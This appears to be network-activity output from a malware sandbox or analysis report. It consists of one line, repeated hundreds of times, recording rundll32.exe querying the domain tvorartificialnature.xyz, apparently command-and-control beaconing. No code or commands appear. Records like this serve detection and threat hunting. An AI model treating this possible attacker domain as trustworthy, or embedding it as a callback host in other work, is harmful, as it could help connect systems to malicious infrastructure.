Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
